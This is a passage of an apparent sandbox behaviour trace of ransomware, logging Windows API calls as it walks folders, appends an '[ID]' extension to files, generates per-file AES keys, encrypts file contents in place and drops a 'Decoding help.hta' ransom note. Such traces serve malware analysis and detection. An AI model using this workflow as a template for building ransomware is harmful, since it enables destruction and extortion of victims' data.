lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.007] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0042.008] CreateFileMappingA (hFile=0x4bc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c0 [0042.008] CryptAcquireContextA (in: phProv=0xb04fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb04fcec*=0x344a128) returned 1 [0045.229] CryptGenKey (in: hProv=0x344a128, Algid=0x6610, dwFlags=0x1, phKey=0xb04fce8 | out: phKey=0xb04fce8*=0x5a5ab0) returned 1 [0045.229] CryptExportKey (in: hKey=0x5a5ab0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb04fbe4, pdwDataLen=0xb04fce4 | out: pbData=0xb04fbe4*, pdwDataLen=0xb04fce4*=0x2c) returned 1 [0045.229] MapViewOfFile (hFileMappingObject=0x4c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x7150000 [0045.246] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb04fbe4*, pdwDataLen=0xb04fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb04fbe4*, pdwDataLen=0xb04fcf8*=0x100) returned 1 [0045.246] CryptEncrypt (in: hKey=0x5a5ab0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7150000, pdwDataLen=0xb04fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x7150000*, pdwDataLen=0xb04fce4*=0x100000) returned 1 [0046.770] UnmapViewOfFile (lpBaseAddress=0x7150000) returned 1 [0046.783] CloseHandle (hObject=0x4c0) returned 1 [0046.783] CryptDestroyKey (hKey=0x5a5ab0) returned 1 [0046.783] CryptReleaseContext (hProv=0x344a128, dwFlags=0x0) returned 1 [0046.783] SetFilePointerEx (in: hFile=0x4bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.783] WriteFile (in: hFile=0x4bc, lpBuffer=0xb04fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb04fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb04fbe4*, lpNumberOfBytesWritten=0xb04fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.886] WriteFile (in: hFile=0x4bc, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb04fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb04fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.886] CloseHandle (hObject=0x4bc) returned 1 [0056.863] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0060.472] FindNextFileW (in: hFindFile=0x5d83d0, lpFindFileData=0xb04fd30 | out: lpFindFileData=0xb04fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0060.472] lstrcpyW (in: lpString1=0x115c9608, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" [0060.472] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0060.472] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0060.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0060.473] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OutlookMUI.msi") returned -1 [0060.473] lstrlenW (lpString="OutlookMUI.msi") returned 14 [0060.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*" [0060.473] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0060.473] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="OutlookMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" [0060.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" [0060.473] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0060.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.587] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x930 [0061.587] CreateFileMappingA (hFile=0x930, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa2c [0061.587] CryptAcquireContextA (phProv=0xb04fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 118 os_tid = 0x130 [0040.147] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*", lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5c70 [0041.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.446] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.446] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.446] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.446] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0041.446] lstrcmpW (lpString1=".", lpString2="ado") returned -1 [0041.447] lstrcmpW (lpString1="..", lpString2="ado") returned -1 [0041.447] lstrcmpiW (lpString1="windows", lpString2="ado") returned 1 [0041.447] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.447] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="ado" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado" [0041.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0041.447] GlobalMemoryStatus (in: lpBuffer=0x40cfd10 | out: lpBuffer=0x40cfd10) [0041.447] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f00e18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x290 [0041.448] CloseHandle (hObject=0x290) returned 1 [0041.448] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf4f1c09, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf4f1c09, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x128ffb00, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0041.448] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.448] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta" [0041.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\decoding help.hta")) returned 0xffffffff [0041.448] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x290 [0041.449] WriteFile (in: hFile=0x290, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x40cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x40cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.450] CloseHandle (hObject=0x290) returned 1 [0041.450] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.450] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DirectDB.dll") returned -1 [0041.450] lstrlenW (lpString="DirectDB.dll") returned 12 [0041.450] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.450] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.450] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="DirectDB.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" [0041.450] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" [0041.450] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\directdb.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.451] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0041.451] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0041.451] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0041.451] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0041.451] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.451] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US" [0041.451] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*" [0041.451] GlobalMemoryStatus (in: lpBuffer=0x40cfd10 | out: lpBuffer=0x40cfd10) [0041.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94184c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x290 [0041.452] CloseHandle (hObject=0x290) returned 1 [0041.452] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0041.452] lstrcmpW (lpString1=".", lpString2="msadc") returned -1 [0041.452] lstrcmpW (lpString1="..", lpString2="msadc") returned -1 [0041.452] lstrcmpiW (lpString1="windows", lpString2="msadc") returned 1 [0041.453] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.453] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.453] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="msadc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc" [0041.453] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0041.453] GlobalMemoryStatus (in: lpBuffer=0x40cfd10 | out: lpBuffer=0x40cfd10) [0041.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9388250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x290 [0041.453] CloseHandle (hObject=0x290) returned 1 [0041.453] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSMAPI", cAlternateFileName="")) returned 1 [0041.453] lstrcmpW (lpString1=".", lpString2="MSMAPI") returned -1 [0041.453] lstrcmpW (lpString1="..", lpString2="MSMAPI") returned -1 [0041.453] lstrcmpiW (lpString1="windows", lpString2="MSMAPI") returned 1 [0041.454] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.454] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.454] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="MSMAPI" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI" [0041.454] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\*.*" [0041.454] GlobalMemoryStatus (in: lpBuffer=0x40cfd10 | out: lpBuffer=0x40cfd10) [0041.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a32ba8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x290 [0041.455] CloseHandle (hObject=0x290) returned 1 [0041.455] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0041.455] lstrcmpW (lpString1=".", lpString2="Ole DB") returned -1 [0041.455] lstrcmpW (lpString1="..", lpString2="Ole DB") returned -1 [0041.455] lstrcmpiW (lpString1="windows", lpString2="Ole DB") returned 1 [0041.455] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.455] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="Ole DB" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB" [0041.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\*.*" [0041.455] GlobalMemoryStatus (in: lpBuffer=0x40cfd10 | out: lpBuffer=0x40cfd10) [0041.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93d0388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x290 [0041.456] CloseHandle (hObject=0x290) returned 1 [0041.456] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5390a1, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xcc5390a1, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd8800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0041.456] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.456] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta" [0041.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\decoding help.hta")) returned 0x1 [0041.456] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wab32.dll") returned -1 [0041.456] lstrlenW (lpString="wab32.dll") returned 9 [0041.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*" [0041.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\*.*") returned 44 [0041.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\", lpString2="wab32.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" [0041.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" [0041.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\wab32.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.457] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x40cfd30 | out: lpFindFileData=0x40cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f46d56, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc0f46d56, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x1f9ed5b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0x0, dwReserved1=0x0, 